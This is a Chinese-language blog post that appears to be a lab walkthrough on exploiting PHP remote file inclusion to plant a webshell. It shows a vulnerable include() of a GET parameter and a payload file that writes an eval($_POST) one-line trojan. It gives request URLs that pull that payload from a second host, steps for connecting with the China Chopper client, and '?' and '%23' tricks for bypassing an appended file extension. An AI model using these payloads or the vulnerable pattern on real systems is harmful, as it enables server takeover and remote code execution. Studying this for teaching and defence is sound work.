遠端檔案包含shell

託帕發表於2018-08-06

預備知識

程式開發人員通常會把可重複使用的函式寫到單個檔案中,在使用某些函式時,直接呼叫此檔案,無須再次編寫,這種呼叫檔案的過程稱為包含。

實驗目的

遠端檔案包含shell

實驗工具

火狐瀏覽器菜刀軟體工具

實驗環境

客戶機一臺(作業系統為Windows Server 2003)伺服器一臺(作業系統為Windows Server 2003)

實驗步驟

1、訪問127.0.0.1/FI/PHP_FI.php?filename=RFI.txt,網頁顯示是遠端檔案包含漏洞。

2、訪問網址127.0.0.1/yi.txt,可以看到可以訪問的木馬。

3.訪問127.0.0.1/FI/PHP_FI.php?filename=http://127.0.0.1/yi.txt會在當前目錄生成一句話木馬a.php

3、開啟桌面的【實驗工具】資料夾,雙擊開啟【中國菜刀】資料夾,找到【中國菜刀.exe】,雙擊開啟。

利用遠端檔案漏洞用菜刀連線,空白處右擊選擇【新增】。

地址處填寫http://127.0.0.1/FI/a.php。新增完畢,雙擊新新增的記錄進行執行

 

 

1.本機上2.php的程式碼如下

<?php
     $sj=$_GET['sj'];
     include($sj);
?>

假如我們不能上傳檔案,又想拿到shell,我們ke'y可以先寫一個muma.txt,內容如下:

<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>

訪問http://ip1/2.php?sj=http://ip2/muma.txt

上菜刀

2(繞過方式).本機上2.php的程式碼如下

<?php
     $sj=$_GET['sj'];
     include($sj.".html");
?>

muma.txt如上

訪問http://ip1/2.php?sj=http://ip2/muma.txt?

上菜刀

繞過方式分為(1.?繞過  2.#繞過%23)

 

 

 

 

相關文章